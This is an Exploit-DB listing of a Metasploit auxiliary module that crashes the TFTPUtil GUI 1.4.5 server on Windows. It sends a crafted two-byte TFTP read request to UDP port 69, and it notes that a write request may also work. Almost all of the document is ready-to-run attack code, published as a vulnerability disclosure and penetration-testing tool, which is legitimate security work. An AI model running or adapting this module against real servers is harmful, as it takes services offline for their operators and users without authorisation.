TFTPUtil GUI 1.4.5 - Denial of Service (Metasploit)

EDB-ID:

15674

CVE:

N/A


Type:

dos


Platform:

Windows

Date:

2010-12-04


# Title: TFTPUtil GUI v1.4.5 Invalid Request DoS
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Vuk Ivanovic
# Published: 2010-12-04
# Verified: yes
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
##
#
# TFTPGUI v1.4.5 Invalid Request DoS
#
# Tested on: Windows XP, SP2 (EN)
#
# Date tested: 11/27/2010
#
#
# 
# Discovered by: Vuk Ivanovic(musashi42)
# 
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Auxiliary
 
    include Msf::Exploit::Remote::Udp
    include Msf::Auxiliary::Dos
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'TFTPGUI v1.4.5 Invalid Request DoS',
            'Description'    => %q{
                The TFTPUtil GUI server version 1.4.5 can be
                DOSed by sending a specially crafted read request. Depending
		of the setup, sending write request "\x00\x02" may also
		work. Discovered by musashi42.
                
            },
            'Author'         => 'musashi42',
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 2 $',
            'References'     =>
                [
                    [ 'URL', 'http://www.exploit-db.com/exploits/12482'],
                    [ 'URL', 'https://www.securityfocus.com/bid/39872'],
                ],
            'DisclosureDate' => 'December 04 2010'))
 
        register_options([Opt::RPORT(69)])
    end
 
    def run
        connect_udp
        print_status("Sending read request...")
        $stuff = "\00\x01"
        udp_sock.put($stuff)       
        disconnect_udp
    end
end